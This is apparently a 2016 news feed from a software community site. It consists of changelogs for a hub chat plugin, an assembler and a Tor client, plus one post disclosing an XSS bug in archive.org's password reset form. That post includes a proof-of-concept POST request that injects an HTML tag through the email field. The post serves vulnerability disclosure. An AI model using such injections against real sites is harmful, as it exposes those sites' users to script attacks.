This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
18.97.9.168.US.SSL

Ledokol Ledokol 2.8.9.16

Changes in 2.8.9.16
[  6] Fixed: Chat replacer feature now replaces all occurrences of an entry instead of first only
[  6] Fixed: Possible error when unloading Lua plugin, report by KCAHDEP
[ 11] Fixed: Search filter block list was never blocking
[ 12] Fixed: Escape of special characters in chat messages from other scripts, report by KCAHDEP
[ 12] Fixed: Incorrect position of next word in chat replacer, report by KCAHDEP
[ 13] Fixed: Error when settings some configurations to empty value
[  5] Added: Support for new VH_OnParsedMsgSupports callback
[  8] Added: Search filter actions 8 and 9 to block all next search requests from user, action 8 is silent
[  9] Added: Chat replacer exception types, 0 = nick, 1 = IP and 2 = LRE, request by KCAHDEP
[ 10] Added: Hub URL to user information when available
[ 11] Added: sefiblockdel to delete user from search filter block list on logout
[ 11] Added: sefibllist command to show users in search filter block list
[ 11] Added: sefibldel command to delete users from search filter block list
[ 14] Added: Take advantage of VH_OnSetConfig callback if supported by hub
[ 15] Added: Support for opchat_to_all script command, external scripts can use this to send operator chat history line to Ledokol
[ 16] Added: Requirement to gain some uptime in order to use public and private chats and related commands
[ 16] Added: Notification on low registration, search and chat uptimes
[  7] Removed: Infected user redirect to AVDB quarantine hub

File information: Ledokol 2.8.9.16
Posted by ledokol on 2016-03-23 14:41 0 comments 5 likes

zIRON zIRON Assembler 2.0.0.25

Changes in 2.0.0.25
Added plugin function ziron_file_setbuffer.
Case states can contain multiple operands using comma seperator.
Rewrote and improved case/state handler.
Assigning larger variable to smaller will truncate value.
Fixed assigning variable to register using movzx instead of mov.
Added 2 new plugin functions: ziron_var_fixupcount and ziron_var_fixup.
Uses can now accept "flags" keyword for pushf / popf.
Fixed a bug with variable operands using incorrect displacements.

File information: zIRON Assembler 2.0.0.25
Posted by ziron on 2016-03-21 19:41 0 comments 5 likes

Archive.org password reset form XSS bug

Vulnerable page: http://archive.org/account/

PoC
POST /account/login.forgotpw.php HTTP/1.1
Host: archive.org
email="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in email input box, or request any XSS code directly using POST method and email parameter.

PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2016-03-19 23:57 2 comments 7 likes

Advanced Onion Router Advanced Onion Router 0.3.0.21

Here is the official list of updated directory authorities that is used since AdvOR 0.3.0.21:

Code
moria1 orport=9101 v3ident=D586D18309DED4CD6D57C18FDB97EFA96D330566 128.31.0.34:9131 9695 DFC3 5FFE B861 329B 9F1A B04C 4639 7020 CE31
tor26 orport=443 v3ident=14C131DFC5C6F93646BE72FA1401C02A8DF2E8B4 86.59.21.38:80 847B 1F85 0344 D787 6491 A548 92F9 0493 4E4E B85D
dizum orport=443 v3ident=E8A9C45EDE6D711294FADF8E7951F4DE6CA56B58 194.109.206.212:80 7EA6 EAD6 FD83 083C 538F 4403 8BBF A077 587D D755
Tonga orport=443 bridge 82.94.251.203:80 4A0C CD2D DC79 9508 3D73 F5D6 6710 0C8A 5831 F16D
longclaw orport=443 v3ident=23D15D965BC35114467363C165C4F724B64B4F66 199.254.238.53:80 74A9 1064 6BCE EFBC D2E8 74FC 1DC9 9743 0F96 8145
gabelmoo orport=443 v3ident=ED03BB616EB2F60BEC80151114BB25CEF515B226 131.188.40.189:80 F204 4413 DAC2 E02E 3D6B CF47 35A1 9BCA 1DE9 7281
dannenberg orport=443 v3ident=0232AF901C31A04EE9848595AF9BB7620D4C5B2E 193.23.244.244:80 7BE6 83E6 5D48 1413 21C5 ED92 F075 C553 64AC 7123
urras orport=80 v3ident=80550987E1D626E3EBA5E5E75A458DE0626D088C 208.83.223.34:443 0AD3 FA88 4D18 F89E EA2D 89C0 1937 9E0E 7FD9 4417
maatuska orport=80 v3ident=49015F787433103580E3B66A1707A00E60F2D15B 171.25.193.9:443 BD6A 8292 55CB 08E6 6FBE 7D37 4836 3586 E46B 3810
Faravahar orport=443 v3ident=EFCBE720AB3A82B99F9E953CD5BF50F7EEFC7B97 154.35.175.225:80 CF6D 0AAF B385 BE71 B8E1 11FC 5CFF 4B47 9237 33BC

Changes in 0.3.0.21
- the OpenSSL library was updated to openssl-1.0.2g
- geoip_c.h was updated with GeoIPCountryWhois.csv released on March 2nd; there are 119072 IP ranges having 92 ranges in the fake "A1" country; 89 ranges were approximated to real countries
- updated directory authorities (thanks to anonymous for reporting this problem on sf.net)

File information: Advanced Onion Router 0.3.0.21
Posted by advor on 2016-03-10 17:10 0 comments 5 likes

Advanced Onion Router Advanced Onion Router 0.3.0.20

Changes in 0.3.0.20
- corrected: the subdomain was not removed from an .onion address when searching for its rendezvous descriptor (thanks to AyrA for reporting this problem on sf.net)
- the OpenSSL library was updated to openssl-1.0.1g
- geoip_c.h was updated with GeoIPCountryWhois.csv released on April 2nd; there are 93477 IP ranges having 102 ranges in the fake "A1" country; 98 ranges were approximated to real countries
- updated directory authorities as discussed here: https://sourceforge.net/p/advtor/discussion/942232/thread/1704cbae/

File information: Advanced Onion Router 0.3.0.20
Posted by advor on 2016-03-08 23:36 0 comments 1 like